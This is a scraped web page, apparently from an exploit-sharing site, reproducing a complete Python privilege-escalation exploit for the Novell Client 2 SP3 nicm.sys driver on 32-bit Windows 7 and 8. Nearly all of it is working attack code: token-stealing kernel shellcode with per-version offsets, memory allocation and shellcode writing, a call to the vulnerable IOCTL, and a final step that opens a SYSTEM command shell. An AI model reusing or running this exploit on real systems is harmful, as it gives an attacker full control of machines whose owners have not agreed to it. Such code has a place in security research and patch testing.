扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 |
# Novell Client 2 SP3 Privilege escalation exploit # Tested on Windows 7 and 8 (x86) / nicm.sys 3.1.11.0 # Thanks to Master Ryujin :) # The first public information I have seen about this bug was from Nikita Tarakanov @NTarakanov (I am not sure weather there was anything else public) # Exploit for DEMO purposes :) # Does not bypass SMEP on Windows 8 # Metasploit module working against Windows 7: http://www.exploit-db.com/exploits/26452/ from ctypes import * import sys,struct,os from optparse import OptionParser kernel32 = windll.kernel32 ntdll= windll.ntdll if __name__ == '__main__': usage ="%prog -o <target>" parser = OptionParser(usage=usage) parser.add_option("-o", type="string", action="store", dest="target_os", help="Available target operating systems: WIN7, WIN8") (options, args) = parser.parse_args() OS = options.target_os if not OS or OS.upper() not in ['WIN7','WIN8']: parser.print_help() sys.exit() OS = OS.upper() if OS == "WIN7": _KPROCESS = "\x50" # Offset for Win7 _TOKEN= "\xf8" # Offset for Win7 _UPID = "\xb4" # Offset for Win7 _APLINKS= "\xb8" # Offset for Win7 steal_token ="\x52" +\ "\x53" +\ "\x33\xc0" +\ "\x64\x8b\x80\x24\x01\x00\x00" +\ "\x8b\x40" + _KPROCESS +\ "\x8b\xc8" +\ "\x8b\x98" + _TOKEN + "\x00\x00\x00" +\ "\x89\x1d\x00\x09\x02\x00" +\ "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\ "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\ "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\ "\x75\xe8" +\ "\x8b\x90" + _TOKEN + "\x00\x00\x00" +\ "\x8b\xc1" +\ "\x89\x90" + _TOKEN + "\x00\x00\x00" +\ "\x5b" +\ "\x5a" +\ "\xc2\x08" sc = steal_token else: _KPROCESS = "\x80" # Offset for Win8 _TOKEN= "\xEC" # Offset for Win8 _UPID = "\xB4" # Offset for Win8 _APLINKS= "\xB8" # Offset for Win8 steal_token ="\x52" +\ "\x53" +\ "\x33\xc0" +\ "\x64\x8b\x80\x24\x01\x00\x00" +\ "\x8b\x80" + _KPROCESS + "\x00\x00\x00"+\ "\x8b\xc8" +\ "\x8b\x98" + _TOKEN + "\x00\x00\x00" +\ "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\ "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\ "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\ "\x75\xe8" +\ "\x8b\x90" + _TOKEN + "\x00\x00\x00" +\ "\x8b\xc1" +\ "\x89\x90" + _TOKEN + "\x00\x00\x00" +\ "\x5b" +\ "\x5a" +\ "\xc2\x08" sc = steal_token kernel_sc = "\x14\x00\x0d\x0d" kernel_sc+= "\x41\x41\x41\x41" kernel_sc+= "\x41\x41\x41\x41" kernel_sc+= "\x41\x41\x41\x41" kernel_sc+= "\x41\x41\x41\x41" kernel_sc+= "\x18\x00\x0d\x0d" kernel_sc+= "\x41\x41\x41\x41" kernel_sc+= "\x41\x41\x41\x41" kernel_sc+= "\x41\x41\x41\x41" kernel_sc+= "\x28\x00\x0d\x0d" kernel_sc+= sc print "[>] Novell Client 2 SP3 privilege escalation for Windows 7 and Windows 8." print "[>] Finding the driver." GENERIC_READ = 0x80000000 GENERIC_WRITE = 0x40000000 OPEN_EXISTING = 0x3 DEVICE = '\\\\.\\nicm' device_handler = kernel32.CreateFileA(DEVICE, GENERIC_READ|GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) EVIL_IOCTL = 0x00143B6B # Vulnerable IOCTL retn = c_ulong() inut_buffer = 0x0d0d0000 inut_size = 0x14 output_buffer = 0x0 output_size = 0x0 baseadd= c_int(0x0d0d0000) MEMRES = (0x1000 | 0x2000) PAGEEXE= 0x00000040 Zero_Bits = c_int(0) RegionSize = c_int(0x1000) write= c_int(0) print "[>] Allocating memory for our shellcode." dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0, byref(RegionSize), MEMRES, PAGEEXE) print "[>] Writing the shellcode." kernel32.WriteProcessMemory(-1, 0x0d0d0000, kernel_sc, 0x1000, byref(write)) if device_handler: print "[>] Sending IOCTL to the driver." dev_io = kernel32.DeviceIoControl(device_handler, EVIL_IOCTL, inut_buffer, inut_size, output_buffer, output_size, byref(retn), None) print "[>] Dropping to a SYSTEM shell." os.system("cmd.exe /K cd C:\\windows\\system32") |
体验盒子
